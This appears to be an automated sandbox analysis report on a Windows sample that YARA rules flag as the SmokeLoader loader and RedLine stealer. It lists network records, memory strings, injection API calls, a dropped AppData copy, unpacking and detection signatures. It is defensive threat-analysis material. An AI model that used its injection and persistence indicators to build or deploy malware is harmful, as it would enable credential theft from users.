Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:49:41 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:49:48 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:49:56 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:50:02 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:50:07 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:50:12 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:50:16 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:50:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:50:28 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:50:33 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:50:40 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:50:44 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:50:50 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Fri, 26 Apr 2024 09:50:58 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Source: explorer.exe, 00000002.00000000.2046464539.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2046464539.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000002.00000000.2042687938.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: explorer.exe, 00000002.00000000.2046464539.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2046464539.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000002.00000000.2046464539.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2046464539.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000002.00000000.2046464539.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2046464539.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000002.00000000.2046464539.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000002.00000000.2045859613.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2045270374.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2045828799.0000000008870000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000002.00000000.2050412699.000000000C860000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000002.00000000.2049916857.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000002.00000000.2044572626.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000002.00000000.2046464539.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000002.00000000.2044572626.0000000007637000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000002.00000000.2043431169.00000000035FA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.coml
Source: explorer.exe, 00000002.00000000.2046464539.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000002.00000000.2046464539.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000002.00000000.2049916857.000000000C460000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000002.00000000.2046464539.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 00000002.00000000.2046464539.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comon

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.2058725868.0000000004140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2298532365.00000000041D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2298471164.00000000041B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2058891382.00000000042F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2058725868.0000000004140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.2058699871.0000000004130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2059007895.0000000004344000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000006.00000002.4450918361.0000000004136000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000004.00000002.2298449396.00000000041A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000004.00000002.2298381632.0000000004064000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000004.00000002.2298532365.00000000041D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.2298471164.00000000041B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.2058891382.00000000042F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000006.00000002.4451244629.0000000005C60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Code function: 0_2_004013ED NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004013ED
Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Code function: 0_2_00401507 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401507
Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Code function: 0_2_00401518 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401518
Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Code function: 0_2_0040141C NtAllocateVirtualMemory,	0_2_0040141C
Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Code function: 0_2_0040151C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_0040151C
Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Code function: 0_2_0040142C NtAllocateVirtualMemory,	0_2_0040142C
Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Code function: 0_2_004032D5 GetModuleHandleA,NtMapViewOfSection,NtQuerySystemInformation,NtQueryKey,RtlCreateUserThread,wcsstr,	0_2_004032D5
Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Code function: 0_2_004014E2 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004014E2
Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Code function: 0_2_004013EC NtAllocateVirtualMemory,	0_2_004013EC
Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Code function: 0_2_004014ED NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004014ED
Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Code function: 0_2_004013F9 NtAllocateVirtualMemory,	0_2_004013F9
Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Code function: 0_2_00402381 NtQuerySystemInformation,	0_2_00402381
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Code function: 4_2_004013ED NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_004013ED
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Code function: 4_2_00401507 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401507
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Code function: 4_2_00401518 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401518
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Code function: 4_2_0040141C NtAllocateVirtualMemory,	4_2_0040141C
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Code function: 4_2_0040151C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_0040151C
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Code function: 4_2_0040142C NtAllocateVirtualMemory,	4_2_0040142C
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Code function: 4_2_004032D5 GetModuleHandleA,NtCreateSection,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,NtQueryKey,NtEnumerateKey,RtlCreateUserThread,strstr,tolower,towlower,	4_2_004032D5
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Code function: 4_2_004014E2 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_004014E2
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Code function: 4_2_004013EC NtAllocateVirtualMemory,	4_2_004013EC
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Code function: 4_2_004014ED NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_004014ED
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Code function: 4_2_004013F9 NtAllocateVirtualMemory,	4_2_004013F9
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Code function: 4_2_00402381 NtQuerySystemInformation,	4_2_00402381
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Code function: 6_2_00402381 NtQuerySystemInformation,	6_2_00402381

Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Code function: 0_2_0040F814	0_2_0040F814
Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Code function: 0_2_00410DD2	0_2_00410DD2
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Code function: 4_2_0040F814	4_2_0040F814
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Code function: 4_2_00410DD2	4_2_00410DD2
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Code function: 6_2_0040F814	6_2_0040F814
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Code function: 6_2_00410DD2	6_2_00410DD2

Source: rBwTlpgnjc.exe, 00000000.00000002.2058606981.0000000004023000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFirezer( vs rBwTlpgnjc.exe
Source: rBwTlpgnjc.exe	Binary or memory string: OriginalFilenameFirezer( vs rBwTlpgnjc.exe

Source: rBwTlpgnjc.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.2058725868.0000000004140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.2058699871.0000000004130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2059007895.0000000004344000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000006.00000002.4450918361.0000000004136000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000004.00000002.2298449396.00000000041A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000004.00000002.2298381632.0000000004064000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000004.00000002.2298532365.00000000041D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.2298471164.00000000041B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.2058891382.00000000042F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000006.00000002.4451244629.0000000005C60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.evad.winEXE@3/2@6/2

Source: C:\Users\user\Desktop\rBwTlpgnjc.exe

Code function: 0_2_0434B756 CreateToolhelp32Snapshot,Module32First,

0_2_0434B756

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\ivfjsrs

Jump to behavior

Source: rBwTlpgnjc.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\rBwTlpgnjc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: rBwTlpgnjc.exe

Virustotal: Detection: 44%

Source: unknown	Process created: C:\Users\user\Desktop\rBwTlpgnjc.exe "C:\Users\user\Desktop\rBwTlpgnjc.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ivfjsrs C:\Users\user\AppData\Roaming\ivfjsrs
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ivfjsrs C:\Users\user\AppData\Roaming\ivfjsrs

Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Section loaded: msvcr100.dll	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\rBwTlpgnjc.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: rBwTlpgnjc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: rBwTlpgnjc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: rBwTlpgnjc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: rBwTlpgnjc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: rBwTlpgnjc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: rBwTlpgnjc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: rBwTlpgnjc.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\xohayajixapeh mon-muvicupifujuja\rohagi_cedepamavosan.pdb source: rBwTlpgnjc.exe, ivfjsrs.2.dr
Source:	Binary string: C:\xohayajixapeh mon-muvicupifujuja\rohagi_cedepamavosan.pdb source: rBwTlpgnjc.exe, ivfjsrs.2.dr

Source: rBwTlpgnjc.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: rBwTlpgnjc.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: rBwTlpgnjc.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: rBwTlpgnjc.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: rBwTlpgnjc.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Unpacked PE file: 0.2.rBwTlpgnjc.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Unpacked PE file: 4.2.ivfjsrs.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Unpacked PE file: 6.2.ivfjsrs.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:EW;

Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Code function: 0_2_00401205 push ecx; iretd	0_2_00401211
Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Code function: 0_2_00401735 push eax; retf	0_2_00401737
Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Code function: 0_2_004031E3 push eax; ret	0_2_004032BE
Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Code function: 0_2_00410FC0 push eax; ret	0_2_00410FDE
Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Code function: 0_2_0413126C push ecx; iretd	0_2_04131278
Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Code function: 0_2_0435962F push edx; retf	0_2_0435963D
Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Code function: 0_2_04352E00 push edx; retf	0_2_04352E01
Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Code function: 0_2_04353175 push edx; ret	0_2_0435317A
Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Code function: 0_2_04359CB2 push edi; retf	0_2_04359CB5
Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Code function: 0_2_04351FB9 push esi; ret	0_2_04351FBA
Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Code function: 0_2_043446BA push esi; retf	0_2_043446BD
Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Code function: 0_2_0434FB96 push cs; retf	0_2_0434FB97
Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Code function: 0_2_04359D82 push edx; retf	0_2_04359D85
Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Code function: 0_2_0434468A push esi; retf	0_2_0434468D
Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Code function: 0_2_0434C3F3 push ecx; iretd	0_2_0434C3FF
Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Code function: 0_2_043594EA push edx; retf	0_2_043594ED
Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Code function: 0_2_043594DC push edi; retf	0_2_043594DD
Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Code function: 0_2_04359BCC push edx; retf	0_2_04359BCD
Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Code function: 0_2_04359ACA push edi; retf	0_2_04359ACD
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Code function: 4_2_00401205 push ecx; iretd	4_2_00401211
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Code function: 4_2_00401735 push eax; retf	4_2_00401737
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Code function: 4_2_004031E3 push eax; ret	4_2_004032BE
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Code function: 4_2_00410FC0 push eax; ret	4_2_00410FDE
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Code function: 4_2_04073245 push edx; ret	4_2_0407324A
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Code function: 4_2_0406FC66 push cs; retf	4_2_0406FC67
